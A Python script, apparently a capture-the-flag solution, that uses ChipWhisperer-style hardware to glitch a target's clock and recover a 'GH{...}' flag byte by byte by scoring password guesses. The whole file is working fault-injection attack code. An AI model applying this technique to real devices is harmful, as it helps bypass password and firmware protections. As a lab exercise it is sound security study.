# =================================================
# GLITCH CLOCK FLAG EXTRACTOR v4 (FAST MODE)
# =================================================
import time
# Candidate glitch settings as (width, offset, ext_offset) triples, in the
# order test_pw() applies them to scope.glitch.
good_spots = [
    (10.15625, -1.171875, 6),
    (10.15625, 1.171875, 1),
]
# Known flag prefix; the extraction loop appends one recovered character per
# position to this list.
flag = list("GH{")
# -------- Reset HW --------
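def reboot_flush():
    """Pulse the target reset line, then flush the target serial port.

    Drives ``scope.io.nrst`` low for 2 ms, sets it high again, waits 4 ms,
    calls ``target.ser.flush()`` and waits a further 2 ms.

    ``scope`` and ``target`` are module globals that are not created in this
    section; they look like ChipWhisperer scope/target objects -- confirm
    against the setup code.
    """
    scope.io.nrst = 'low'
    time.sleep(0.002)
    scope.io.nrst = 'high'
    time.sleep(0.004)
    try:
        target.ser.flush()
    except Exception:
        # The flush stays best-effort: a failure here must not abort the run.
        # Catching Exception instead of using a bare ``except`` lets
        # KeyboardInterrupt and SystemExit propagate, so Ctrl-C still stops a
        # long capture campaign.
        pass
    time.sleep(0.002)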
# -------- Test PW --------
def test_pw(pw_bytes, glitch):
    """Send one password guess under one glitch setting and return the reply.

    Args:
        pw_bytes: Iterable of byte values; converted with ``bytes()`` and sent
            as the payload of the ``'z'`` command.
        glitch: Indexable triple ``(width, offset, ext_offset)`` written to
            ``scope.glitch`` before the attempt.

    Returns:
        The ``"payload"`` entry of the ``'r'`` response, or ``None`` when
        ``scope.capture()`` returns a truthy value, when nothing is read
        back, or when the response is not marked ``"valid"``.
    """
    glitch_cfg = scope.glitch
    glitch_cfg.width = glitch[0]
    glitch_cfg.offset = glitch[1]
    glitch_cfg.ext_offset = glitch[2]

    # Every attempt starts from a freshly reset target.
    reboot_flush()
    scope.arm()
    target.simpleserial_write('z', bytes(pw_bytes))

    # NOTE(review): a truthy capture() result is treated as a failed attempt
    # (presumably a capture timeout) -- confirm against the scope API in use.
    capture_flag = scope.capture()
    if capture_flag:
        return None

    response = target.simpleserial_read_witherrors('r', 15, timeout=40)
    if response and response["valid"]:
        return response["payload"]
    return None
# -------- Pick the best glitch spot for this byte --------
def pick_best_spot():
    """Return the entry of ``good_spots`` that scores best on a fixed probe.

    Each spot is tried three times with the same 15-byte probe
    ``"GH{XXXXXXXXXXX}"``; an attempt counts as a hit when a payload comes
    back and its first byte equals ``ord('G')``. The probe does not depend on
    which flag position is currently being recovered.

    Returns:
        The spot with the highest hit count; on a tie, the one listed first
        in ``good_spots``.

    Raises:
        ValueError: If ``good_spots`` is empty (``max`` of an empty mapping).
    """
    probe = [ord(ch) for ch in "GH{XXXXXXXXXXX}"][:15]
    expected_first = ord('G')
    hits_by_spot = {}
    for candidate in good_spots:
        # Lazy generator: the three attempts still run one after another.
        replies = (test_pw(probe, candidate) for _ in range(3))
        hits_by_spot[candidate] = sum(
            1 for reply in replies if reply and reply[0] == expected_first
        )
    return max(hits_by_spot, key=hits_by_spot.get)
# =================================================
# FLAG EXTRACTION
# =================================================
def _build_guess(known, position, value):
    """Return a 15-byte guess: known prefix, 0x5A filler, `value` at `position`."""
    guess = [0x5A] * 15
    for idx, ch in enumerate(known):
        guess[idx] = ord(ch)
    guess[position] = value
    return guess


def _count_hits(guess, spot, attempts):
    """Count attempts whose reply payload starts with ord('G')."""
    hits = 0
    for _ in range(attempts):
        reply = test_pw(guess, spot)
        if reply and reply[0] == ord('G'):
            hits += 1
    return hits


# Recover positions 3..14 one at a time; positions 0..2 are the known prefix
# already held in `flag`.
for pos in range(3, 15):
    print(f"\n[*] Byte {pos}")

    # Step 1: re-select the glitch setting before working on each position.
    spot = pick_best_spot()
    print(f"[+] Spot utilisé : {spot}")

    # Step 2: coarse pass -- 3 attempts for every printable ASCII candidate.
    coarse = [
        (_count_hits(_build_guess(flag, pos, value), spot, 3), value)
        for value in range(0x20, 0x7F)
    ]

    # Keep the five best (hits, value) pairs; ties sort by higher byte value.
    shortlist = sorted(coarse, reverse=True)[:5]
    print(" top-5 initial :", [(chr(value), hits) for hits, value in shortlist])

    # Step 3: final pass -- 20 attempts per shortlisted candidate. The strict
    # ">" keeps the first candidate when final scores tie.
    winner = None
    winner_hits = -1
    for _, value in shortlist:
        hits = _count_hits(_build_guess(flag, pos, value), spot, 20)
        print(f" candidat {chr(value)} → score final {hits}")
        if hits > winner_hits:
            winner_hits = hits
            winner = value

    print(f"[+] Byte trouvé: {chr(winner)}")
    flag.append(chr(winner))

# NOTE(review): the loop already recovers position 14, which is where the
# probe in pick_best_spot() places "}". Appending another "}" here may print
# a doubled closing brace -- confirm the expected flag length.
flag.append("}")
print("\n====================")
print(" FLAG =", "".join(flag))
print("====================")